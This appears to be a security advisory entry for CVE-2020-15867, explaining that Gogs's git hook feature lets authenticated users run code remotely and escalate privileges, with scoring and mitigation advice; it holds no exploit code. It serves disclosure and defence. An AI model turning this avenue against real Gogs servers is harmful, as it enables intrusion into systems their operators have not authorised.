PT-2020-14674 · Gogs · Gogs

Published

2020-10-16

Updated

2022-04-26

CVE-2020-15867

CVSS v3.1

7.2

High

Vector

AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Name of the Vulnerable Software and Affected Versions Gogs versions 0.5.5 through 0.12.2

Description The git hook feature in Gogs allows for authenticated remote code execution. This can lead to a privilege escalation if access to this hook feature is granted to a user without administrative privileges. The issue is notable because the documentation mentions it, but the UI does not warn the user about the potential unsafe actions.

Recommendations For Gogs versions 0.5.5 through 0.12.2, consider restricting access to the git hook feature to only administrative users to minimize the risk of exploitation. As a temporary workaround, consider disabling the git hook feature until a patch is available.

Exploit

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Related Identifiers

CVE-2020-15867

Affected Products

Gogs

PT-2020-14674 · Gogs · Gogs

CVE-2020-15867

Related Identifiers

Affected Products

References · 6